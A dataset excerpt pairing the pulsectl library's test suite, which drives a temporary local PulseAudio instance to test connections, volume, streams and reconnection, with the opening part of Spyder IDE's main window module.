source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_with_dummy_instance.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import itertools as it, operator as op, functools as ft
import unittest, contextlib, hashlib, atexit, signal, threading, select, errno
import os, sys, io, time, subprocess, tempfile, shutil, socket
if sys.version_info.major > 2: unicode = str
try: import pulsectl
except ImportError:
sys.path.insert(1, os.path.join(__file__, *['..']*2))
import pulsectl
class adict(dict):
def __init__(self, *args, **kws):
super(adict, self).__init__(*args, **kws)
self.__dict__ = self
def start_sock_delay_thread(*args):
# Simple py2/py3 hack to simulate slow network and test conn timeouts
thread = threading.Thread(target=_sock_delay_thread, args=args)
thread.daemon = True
thread.start()
return thread
def hash_prng(seed, bs):
n, hash_func = 0, hashlib.sha512
with io.BytesIO() as buff:
while True:
seed = hash_func(seed).digest()
n += buff.write(seed)
if n > bs: return buff.getvalue()
def _sock_delay_thread(
ev_ready, ev_done, ev_disco, bind, connect, delay, block=0.1 ):
sl = s = c = None
try:
sl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sl.bind(bind)
sl.listen(1)
ev_ready.set()
sl.settimeout(block)
while True:
ev_disco.clear()
while True:
try: s, addr = sl.accept()
except socket.timeout: pass
else: break
if ev_done.is_set(): return
ts0 = time.time()
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(connect)
s.setblocking(False)
c.setblocking(False)
time.sleep(min(delay, max(0, delay - (time.time() - ts0))))
def _send_data(src, dst, bs=8*2**10):
while True:
try:
buff = src.recv(bs)
if not buff: break
dst.sendall(buff) # just assuming it won't get full here
except socket.error as err:
if err.errno != errno.EAGAIN: return True
break
while True:
r,w,x = select.select([s,c], [], [s,c], block)
if x or ev_done.is_set(): return
if ev_disco.is_set(): break
if not (r or x): continue
if c in r and _send_data(c, s): break
if s in r and _send_data(s, c): break
s, c = s.close(), c.close()
finally:
if c: c.close()
if s: s.close()
if sl: sl.close()
def dummy_pulse_init(info=None):
if not info: info = adict(proc=None, tmp_dir=None)
try: _dummy_pulse_init(info)
except Exception:
dummy_pulse_cleanup(info)
raise
return info
def _dummy_pulse_init(info):
# These are to allow starting pulse with debug logging
# or using pre-started (e.g. with gdb attached) instance.
# Note: PA_REUSE=1234:1234:1235 are localhost tcp ports for tcp modules.
# For example:
# t1% env -i XDG_RUNTIME_DIR=/tmp/pulsectl-tests \
# gdb --args /usr/bin/pulseaudio --daemonize=no --fail \
# -nF /tmp/pulsectl-tests/conf.pa --exit-idle-time=-1 --log-level=debug
# t2% PA_TMPDIR=/tmp/pulsectl-tests PA_REUSE=1234,1235 python -m unittest discover
env_tmpdir, env_debug, env_reuse = map(
os.environ.get, ['PA_TMPDIR', 'PA_DEBUG', 'PA_REUSE'] )
if not os.environ.get('PATH'): os.environ['PATH'] = '/usr/local/bin:/usr/bin:/bin'
tmp_base = env_tmpdir or info.get('tmp_dir')
if not tmp_base:
tmp_base = info.tmp_dir = tempfile.mkdtemp(prefix='pulsectl-tests.')
info.sock_unix = None
tmp_base = os.path.realpath(tmp_base)
tmp_path = ft.partial(os.path.join, tmp_base)
# Pick some random available localhost ports
if not info.get('sock_unix'):
bind = (
['127.0.0.1', 0, socket.AF_INET], ['::1', 0, socket.AF_INET6],
['127.0.0.1', 0, socket.AF_INET], ['127.0.0.1', 0, socket.AF_INET] )
for n, spec in enumerate(bind):
if env_reuse:
spec[1] = int(env_reuse.split(':')[n])
continue
addr, p, af = spec
with contextlib.closing(socket.socket(af, socket.SOCK_STREAM)) as s:
s.bind((addr, p))
s.listen(1)
spec[1] = s.getsockname()[1]
info.update(
sock_unix='unix:{}'.format(tmp_path('pulse', 'native')),
sock_tcp4='tcp4:{}:{}'.format(bind[0][0], bind[0][1]),
sock_tcp6='tcp6:[{}]:{}'.format(bind[1][0], bind[1][1]),
sock_tcp_delay='tcp4:{}:{}'.format(bind[2][0], bind[2][1]),
sock_tcp_delay_src=tuple(bind[2][:2]),
sock_tcp_delay_dst=tuple(bind[0][:2]),
sock_tcp_cli=tuple(bind[3][:2]) )
if not info.get('sock_delay_thread'):
ev_ready, ev_exit, ev_disco = (threading.Event() for n in range(3))
delay = info.sock_delay = 0.5
info.sock_delay_thread_ready = ev_ready
info.sock_delay_thread_disco = ev_disco
info.sock_delay_thread_exit = ev_exit
info.sock_delay_thread = start_sock_delay_thread(
ev_ready, ev_exit, ev_disco,
info.sock_tcp_delay_src, info.sock_tcp_delay_dst, delay )
if info.proc and info.proc.poll() is not None: info.proc = None
if not env_reuse and not info.get('proc'):
env = dict(
PATH=os.environ['PATH'], HOME=os.environ['HOME'],
XDG_RUNTIME_DIR=tmp_base, PULSE_STATE_PATH=tmp_base )
proc_stderr = sys.stderr if env_debug else open('/dev/null', 'wb')
info.proc = subprocess.Popen(
[ 'pulseaudio', '--daemonize=no', '--fail',
'-nF', '/dev/stdin', '--exit-idle-time=-1', '--log-level=debug' ], env=env,
stdin=subprocess.PIPE, stderr=proc_stderr )
if proc_stderr is not sys.stderr: proc_stderr.close()
bind4, bind6 = info.sock_tcp4.split(':'), info.sock_tcp6.rsplit(':', 1)
bind4, bind6 = (bind4[1], bind4[2]), (bind6[0].split(':', 1)[1].strip('[]'), bind6[1])
for line in [
'module-augment-properties',
'module-default-device-restore',
'module-always-sink',
'module-intended-roles',
'module-suspend-on-idle',
'module-position-event-sounds',
'module-role-cork',
'module-filter-heuristics',
'module-filter-apply',
'module-switch-on-port-available',
'module-stream-restore',
'module-native-protocol-tcp auth-anonymous=true'
' listen={} port={}'.format(*bind4),
'module-native-protocol-tcp auth-anonymous=true'
' listen={} port={}'.format(*bind6),
'module-native-protocol-unix',
'module-null-sink',
'module-null-sink' ]:
if line.startswith('module-'): line = 'load-module {}'.format(line)
info.proc.stdin.write('{}\n'.format(line).encode('utf-8'))
info.proc.stdin.close()
timeout, checks, p = 4, 10, info.sock_unix.split(':', 1)[-1]
for n in range(checks):
if not os.path.exists(p):
time.sleep(float(timeout) / checks)
continue
break
else:
raise AssertionError( 'pulseaudio process'
' failed to start or create native socket at {}'.format(p) )
def dummy_pulse_cleanup(info=None, proc=None, tmp_dir=None):
if not info: info = adict(proc=proc, tmp_dir=tmp_dir)
if info.proc:
try: info.proc.terminate()
except OSError: pass
timeout, checks = 4, 10
for n in range(checks):
if info.proc.poll() is None:
time.sleep(float(timeout) / checks)
continue
break
else:
try: info.proc.kill()
except OSError: pass
info.proc.wait()
info.proc = None
if info.get('sock_delay_thread'):
info.sock_delay_thread_exit.set()
info.sock_delay_thread = info.sock_delay_thread.join()
if info.tmp_dir:
shutil.rmtree(info.tmp_dir, ignore_errors=True)
info.tmp_dir = None
class DummyTests(unittest.TestCase):
instance_info = proc = tmp_dir = None
@classmethod
def setUpClass(cls):
assert not cls.proc and not cls.tmp_dir, [cls.proc, cls.tmp_dir]
for sig in 'hup', 'term', 'int':
signal.signal(getattr(signal, 'sig{}'.format(sig).upper()), lambda sig,frm: sys.exit())
atexit.register(cls.tearDownClass)
cls.instance_info = dummy_pulse_init()
for k, v in cls.instance_info.items(): setattr(cls, k, v)
@classmethod
def tearDownClass(cls):
if cls.instance_info: dummy_pulse_cleanup(cls.instance_info)
cls.instance_info = cls.proc = cls.tmp_dir = None
# Fuzzy float comparison is necessary for volume,
# as these loose precision when converted to/from pulse int values.
_compare_floats_rounding = 3
def _compare_floats(self, a, b, msg=None):
if round(a, self._compare_floats_rounding) != round(b, self._compare_floats_rounding):
return self._baseAssertEqual(a, b, msg)
def __init__(self, *args, **kws):
super(DummyTests, self).__init__(*args, **kws)
self.addTypeEqualityFunc(float, self._compare_floats)
def test_enums(self):
enum = pulsectl.PulseEventFacilityEnum
ev_fac_map = dict(sink='sink', sink_input='stream') # hash should match strings
self.assertTrue(ev_fac_map.get(enum.sink))
self.assertTrue(ev_fac_map.get(enum.sink_input))
self.assertEqual(enum.sink, 'sink')
self.assertEqual(enum['sink'], 'sink')
self.assertTrue('sink' in enum)
def test_connect(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse: si = pulse.server_info()
with pulsectl.Pulse('t', server=self.sock_tcp4) as pulse: si4 = pulse.server_info()
self.assertEqual(vars(si), vars(si4))
with pulsectl.Pulse('t', server=self.sock_tcp6) as pulse: si6 = pulse.server_info()
self.assertEqual(vars(si), vars(si6))
def test_connect_timeout(self):
self.sock_delay_thread_ready.wait(timeout=2)
with pulsectl.Pulse('t', server=self.sock_unix) as pulse: si = pulse.server_info()
with pulsectl.Pulse('t', server=self.sock_tcp_delay) as pulse: sid = pulse.server_info()
self.assertEqual(vars(si), vars(sid))
self.sock_delay_thread_disco.set()
with pulsectl.Pulse('t', server=self.sock_tcp_delay, connect=False) as pulse:
pulse.connect()
sid = pulse.server_info()
self.assertEqual(vars(si), vars(sid))
self.sock_delay_thread_disco.set()
with pulsectl.Pulse('t', server=self.sock_tcp_delay, connect=False) as pulse:
pulse.connect(1.0)
sid = pulse.server_info()
self.assertEqual(vars(si), vars(sid))
self.sock_delay_thread_disco.set()
with pulsectl.Pulse('t', server=self.sock_tcp_delay, connect=False) as pulse:
with self.assertRaises(pulsectl.PulseError): pulse.connect(timeout=0.1)
self.sock_delay_thread_disco.set()
pulse.connect(timeout=1.0)
sid = pulse.server_info()
self.assertEqual(vars(si), vars(sid))
self.sock_delay_thread_disco.set()
def test_server_info(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
si, srcs, sinks = pulse.server_info(), pulse.source_list(), pulse.sink_list()
self.assertEqual(len(srcs), 2)
self.assertEqual(len(sinks), 2)
def test_default_set(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
(src1, src2), (sink1, sink2) = pulse.source_list()[:2], pulse.sink_list()[:2]
self.assertNotEqual(sink1.name, sink2.name)
self.assertNotEqual(src1.name, src2.name)
pulse.default_set(sink1)
pulse.default_set(sink1)
pulse.default_set(src1)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink1.name)
self.assertEqual(si.default_source_name, src1.name)
pulse.default_set(sink2)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink2.name)
self.assertEqual(si.default_source_name, src1.name)
pulse.default_set(src2)
pulse.default_set(src2)
pulse.default_set(sink1)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink1.name)
self.assertEqual(si.default_source_name, src2.name)
pulse.sink_default_set(sink2.name)
pulse.source_default_set(src1.name)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink2.name)
self.assertEqual(si.default_source_name, src1.name)
nx = 'xxx'
self.assertNotIn(nx, [sink1.name, sink2.name])
self.assertNotIn(nx, [src1.name, src2.name])
with self.assertRaises(TypeError): pulse.sink_default_set(sink2.index)
with self.assertRaises(pulsectl.PulseOperationFailed): pulse.sink_default_set(nx)
with self.assertRaises(pulsectl.PulseOperationFailed): pulse.source_default_set(nx)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink2.name)
self.assertEqual(si.default_source_name, src1.name)
def test_events(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
sink, cb_called = pulse.sink_list()[0], list()
def ev_cb(ev):
self.assertEqual(ev.facility, 'sink')
self.assertEqual(ev.t, 'change')
self.assertEqual(ev.index, sink.index)
cb_called.append(True)
raise pulsectl.PulseLoopStop
pulse.event_mask_set('all')
pulse.event_callback_set(ev_cb)
pulse.volume_set_all_chans(sink, 0.6)
if not cb_called: pulse.event_listen()
self.assertTrue(bool(cb_called))
pulse.event_mask_set('null')
pulse.event_callback_set(None)
def test_cli(self):
xdg_dir_prev = os.environ.get('XDG_RUNTIME_DIR')
try:
os.environ['XDG_RUNTIME_DIR'] = self.tmp_dir
with contextlib.closing(pulsectl.connect_to_cli(as_file=False)) as s:
s.send(b'dump\n')
while True:
try: buff = s.recv(2**20)
except socket.error: buff = None
if not buff: raise AssertionError
if b'### EOF' in buff.splitlines(): break
with contextlib.closing(pulsectl.connect_to_cli()) as s:
s.write('dump\n')
for line in s:
if line == '### EOF\n': break
else: raise AssertionError
s.write(
'load-module module-cli-protocol-tcp'
' listen={} port={}\n'.format(*self.sock_tcp_cli) )
with contextlib.closing(pulsectl.connect_to_cli(self.sock_tcp_cli)) as s:
s.write('dump\n')
for line in s:
if line == '### EOF\n': break
else: raise AssertionError
s.write('unload-module module-cli-protocol-tcp\n')
finally:
if xdg_dir_prev is not None:
os.environ['XDG_RUNTIME_DIR'] = xdg_dir_prev
def test_sink_src(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
src, sink = pulse.source_list()[0], pulse.sink_list()[0]
self.assertTrue(src.proplist.get('device.class'))
self.assertTrue(isinstance(src.proplist.get('device.class'), unicode))
self.assertTrue(isinstance(list(src.proplist.keys())[0], unicode))
self.assertTrue(sink.proplist.get('device.class'))
self.assertTrue(isinstance(sink.proplist.get('device.class'), unicode))
self.assertTrue(isinstance(list(sink.proplist.keys())[0], unicode))
pulse.mute(src, False)
self.assertFalse(src.mute)
self.assertFalse(pulse.source_info(src.index).mute)
pulse.mute(src, True)
pulse.mute(src, True)
self.assertTrue(src.mute)
self.assertTrue(pulse.source_info(src.index).mute)
pulse.mute(src, False)
pulse.mute(sink, False)
self.assertFalse(sink.mute)
self.assertFalse(pulse.sink_info(sink.index).mute)
pulse.mute(sink)
self.assertTrue(sink.mute)
self.assertTrue(pulse.sink_info(sink.index).mute)
pulse.mute(sink, False)
pulse.volume_set_all_chans(sink, 1.0)
self.assertEqual(sink.volume.value_flat, 1.0)
self.assertEqual(pulse.sink_info(sink.index).volume.values, sink.volume.values)
pulse.volume_set_all_chans(sink, 0.5)
self.assertEqual(sink.volume.value_flat, 0.5)
self.assertEqual(pulse.sink_info(sink.index).volume.values, sink.volume.values)
pulse.volume_change_all_chans(sink, -0.5)
self.assertEqual(sink.volume.value_flat, 0.0)
self.assertEqual(pulse.sink_info(sink.index).volume.values, sink.volume.values)
pulse.volume_set_all_chans(sink, 1.0)
def test_get_sink_src(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
src, sink = pulse.source_list(), pulse.sink_list()
src_nx, sink_nx = max(s.index for s in src)+1, max(s.index for s in sink)+1
src, sink = src[0], sink[0]
self.assertEqual(sink.index, pulse.get_sink_by_name(sink.name).index)
self.assertEqual(src.index, pulse.get_source_by_name(src.name).index)
with self.assertRaises(pulsectl.PulseIndexError): pulse.source_info(src_nx)
with self.assertRaises(pulsectl.PulseIndexError): pulse.sink_info(sink_nx)
# def test_get_card(self): no cards to test these calls with :(
def test_module_funcs(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
self.assertEqual(len(pulse.sink_list()), 2)
idx = pulse.module_load('module-null-sink')
self.assertEqual(len(pulse.sink_list()), 3)
pulse.module_unload(idx)
self.assertEqual(len(pulse.sink_list()), 2)
with self.assertRaises(pulsectl.PulseError):
pulse.module_load('module-that-does-not-exist')
self.assertEqual(len(pulse.sink_list()), 2)
def test_stream(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
stream_started = list()
def stream_ev_cb(ev):
if ev.t != 'new': return
stream_started.append(ev.index)
raise pulsectl.PulseLoopStop
pulse.event_mask_set('sink_input')
pulse.event_callback_set(stream_ev_cb)
paplay = subprocess.Popen(
['paplay', '--raw', '/dev/zero'], env=dict(
PATH=os.environ['PATH'], XDG_RUNTIME_DIR=self.tmp_dir ) )
try:
if not stream_started: pulse.event_listen()
self.assertTrue(bool(stream_started))
stream_idx, = stream_started
stream = pulse.sink_input_info(stream_idx)
self.assertTrue(stream.proplist.get('application.name'))
self.assertTrue(isinstance(stream.proplist.get('application.name'), unicode))
self.assertTrue(isinstance(list(stream.proplist.keys())[0], unicode))
pulse.mute(stream, False)
self.assertFalse(stream.mute)
self.assertFalse(pulse.sink_input_info(stream.index).mute)
pulse.mute(stream)
self.assertTrue(stream.mute)
self.assertTrue(pulse.sink_input_info(stream.index).mute)
pulse.mute(stream, False)
pulse.volume_set_all_chans(stream, 1.0)
self.assertEqual(stream.volume.value_flat, 1.0)
self.assertEqual(pulse.sink_input_info(stream.index).volume.values, stream.volume.values)
pulse.volume_set_all_chans(stream, 0.5)
self.assertEqual(stream.volume.value_flat, 0.5)
self.assertEqual(pulse.sink_input_info(stream.index).volume.values, stream.volume.values)
pulse.volume_change_all_chans(stream, -0.5)
self.assertEqual(stream.volume.value_flat, 0.0)
self.assertEqual(pulse.sink_input_info(stream.index).volume.values, stream.volume.values)
finally:
if paplay.poll() is None: paplay.kill()
paplay.wait()
with self.assertRaises(pulsectl.PulseIndexError): pulse.sink_input_info(stream.index)
def test_ext_stream_restore(self):
sr_name1 = 'sink-input-by-application-name:pulsectl-test-1'
sr_name2 = 'sink-input-by-application-name:pulsectl-test-2'
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
self.assertIsNotNone(pulse.stream_restore_test())
pulse.stream_restore_write(sr_name1, volume=0.5, mute=True)
pulse.stream_restore_write(
pulsectl.PulseExtStreamRestoreInfo(sr_name2, volume=0.3, channel_list='mono'),
apply_immediately=True )
sr_list = pulse.stream_restore_list()
self.assertIsInstance(sr_list, list)
self.assertTrue(sr_list)
sr_dict = dict((sr.name, sr) for sr in sr_list)
self.assertEqual(sr_dict[sr_name1].volume.value_flat, 0.5)
self.assertEqual(sr_dict[sr_name1].mute, 1)
self.assertEqual(sr_dict[sr_name1].channel_list, [pulse.channel_list_enum.mono])
self.assertIn(sr_name2, sr_dict)
self.assertEqual(sr_dict[sr_name1].channel_list, [pulse.channel_list_enum.mono])
self.assertEqual(sr_dict[sr_name1].channel_list_raw, [0])
pulse.stream_restore_delete(sr_name1)
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertNotIn(sr_name1, sr_dict)
self.assertIn(sr_name2, sr_dict)
pulse.stream_restore_write(
[ pulsectl.PulseExtStreamRestoreInfo( sr_name1,
volume=0.7, channel_list=['front-left', 'front-right'] ),
sr_dict[sr_name2] ],
mode='merge' )
pulse.stream_restore_write(sr_name1,
volume=0.3, channel_list='mono', mute=True )
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertEqual(sr_dict[sr_name1].volume.value_flat, 0.7)
self.assertEqual(sr_dict[sr_name1].mute, 0)
self.assertEqual( sr_dict[sr_name1].channel_list,
[pulse.channel_list_enum.front_left, pulse.channel_list_enum.front_right] )
self.assertEqual(sr_dict[sr_name1].channel_list_raw, [1, 2])
pulse.stream_restore_write(sr_name1, volume=0.4, mode='replace')
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertEqual(sr_dict[sr_name1].volume.value_flat, 0.4)
pulse.stream_restore_write(sr_name2, volume=0.9, mode='set')
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertEqual(sr_dict[sr_name2].volume.value_flat, 0.9)
self.assertEqual(list(sr_dict.keys()), [sr_name2])
pulse.stream_restore_write([], mode='set') # i.e. remove all
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertNotIn(sr_name1, sr_dict)
self.assertNotIn(sr_name2, sr_dict)
def test_stream_move(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
stream_started = list()
def stream_ev_cb(ev):
if ev.t != 'new': return
stream_started.append(ev.index)
raise pulsectl.PulseLoopStop
pulse.event_mask_set('sink_input')
pulse.event_callback_set(stream_ev_cb)
paplay = subprocess.Popen(
['paplay', '--raw', '/dev/zero'], env=dict(
PATH=os.environ['PATH'], XDG_RUNTIME_DIR=self.tmp_dir ) )
try:
if not stream_started: pulse.event_listen()
stream_idx, = stream_started
stream = pulse.sink_input_info(stream_idx)
sink_indexes = set(s.index for s in pulse.sink_list())
sink1 = stream.sink
sink2 = sink_indexes.difference([sink1]).pop()
sink_nx = max(sink_indexes) + 1
pulse.sink_input_move(stream.index, sink2)
stream_new = pulse.sink_input_info(stream.index)
self.assertEqual(stream.sink, sink1) # old info doesn't get updated
self.assertEqual(stream_new.sink, sink2)
pulse.sink_input_move(stream.index, sink1) # move it back
stream_new = pulse.sink_input_info(stream.index)
self.assertEqual(stream_new.sink, sink1)
with self.assertRaises(pulsectl.PulseOperationFailed):
pulse.sink_input_move(stream.index, sink_nx)
finally:
if paplay.poll() is None: paplay.kill()
paplay.wait()
def test_get_peak_sample(self):
if not os.environ.get('DEV_TESTS'): return # this test seem to be unreliable due to timings
# Note: this test takes at least multiple seconds to run
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
source_any = max(s.index for s in pulse.source_list())
source_nx = source_any + 1
time.sleep(0.3) # make sure previous streams die
peak = pulse.get_peak_sample(source_any, 0.3)
self.assertEqual(peak, 0)
stream_started = list()
def stream_ev_cb(ev):
if ev.t != 'new': return
stream_started.append(ev.index)
raise pulsectl.PulseLoopStop
pulse.event_mask_set('sink_input')
pulse.event_callback_set(stream_ev_cb)
test_wav = os.path.join(self.tmp_dir, 'test.wav')
with open(test_wav, 'wb') as dst:
dst.write(hash_prng(b'consistent-prng-key-for-audible-noise', 5 * 2**20)) # 5M file
paplay = subprocess.Popen( ['paplay', '--raw', test_wav],
env=dict(PATH=os.environ['PATH'], XDG_RUNTIME_DIR=self.tmp_dir) )
try:
if not stream_started: pulse.event_listen()
stream_idx, = stream_started
si = pulse.sink_input_info(stream_idx)
sink = pulse.sink_info(si.sink)
source = pulse.source_info(sink.monitor_source)
# First poll can randomly fail if too short, probably due to latency or such
peak = pulse.get_peak_sample(sink.monitor_source, 3)
self.assertGreater(peak, 0)
peak = pulse.get_peak_sample(source.index, 0.3, si.index)
self.assertGreater(peak, 0)
peak = pulse.get_peak_sample(source.name, 0.3, si.index)
self.assertGreater(peak, 0)
peak = pulse.get_peak_sample(source_nx, 0.3)
self.assertEqual(peak, 0)
paplay.terminate()
paplay.wait()
peak = pulse.get_peak_sample(source.index, 0.3, si.index)
self.assertEqual(peak, 0)
finally:
if paplay.poll() is None: paplay.kill()
paplay.wait()
class PulseCrashTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
for sig in 'hup', 'term', 'int':
signal.signal(getattr(signal, 'sig{}'.format(sig).upper()), lambda sig,frm: sys.exit())
def test_crash_after_connect(self):
info = dummy_pulse_init()
try:
with pulsectl.Pulse('t', server=info.sock_unix) as pulse:
for si in pulse.sink_list(): self.assertTrue(si)
info.proc.terminate()
info.proc.wait()
with self.assertRaises(pulsectl.PulseOperationFailed):
for si in pulse.sink_list(): raise AssertionError(si)
self.assertFalse(pulse.connected)
finally: dummy_pulse_cleanup(info)
def test_reconnect(self):
info = dummy_pulse_init()
try:
with pulsectl.Pulse('t', server=info.sock_unix, connect=False) as pulse:
with self.assertRaises(Exception):
for si in pulse.sink_list(): raise AssertionError(si)
pulse.connect(autospawn=False)
self.assertTrue(pulse.connected)
for si in pulse.sink_list(): self.assertTrue(si)
info.proc.terminate()
info.proc.wait()
with self.assertRaises(Exception):
for si in pulse.sink_list(): raise AssertionError(si)
self.assertFalse(pulse.connected)
dummy_pulse_init(info)
pulse.connect(autospawn=False, wait=True)
self.assertTrue(pulse.connected)
for si in pulse.sink_list(): self.assertTrue(si)
pulse.disconnect()
with self.assertRaises(Exception):
for si in pulse.sink_list(): raise AssertionError(si)
self.assertFalse(pulse.connected)
pulse.connect(autospawn=False)
self.assertTrue(pulse.connected)
for si in pulse.sink_list(): self.assertTrue(si)
finally: dummy_pulse_cleanup(info)
if __name__ == '__main__': unittest.main()
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developped and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import re
import shutil
import signal
import socket
import glob
import subprocess
import sys
import threading
import traceback
import importlib
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QDesktopWidget, QDockWidget,
QMainWindow, QMenu, QMessageBox, QShortcut,
QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
import qdarkstyle
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, get_versions, __docs_url__)
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
get_python_doc_path, qt_message_handler,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_image_path, get_module_path,
get_module_source_path, get_safe_mode,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_anaconda, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import (configparser as cp, is_text_string,
PY3, qbytearray_to_str, to_text_string)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.programs import is_module_installed
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri,
MENU_SEPARATOR, qapplication,
set_menu_icons)
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
from spyder.app.solver import find_external_plugins, solve_plugin_dependencies
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
WinUserEnvDialog = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
from spyder.utils.environ import WinUserEnvDialog
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "https://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "https://matplotlib.org/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"https://www.riverbankcomputing.com/static/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"https://www.riverbankcomputing.com/static/Docs/PyQt5/module_index.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name):
"""
Return a plugin instance by providing the plugin class.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
raise SpyderAPIError('Plugin "{}" not found!'.format(plugin_name))
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.CONF_SECTION] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
else:
self._INTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
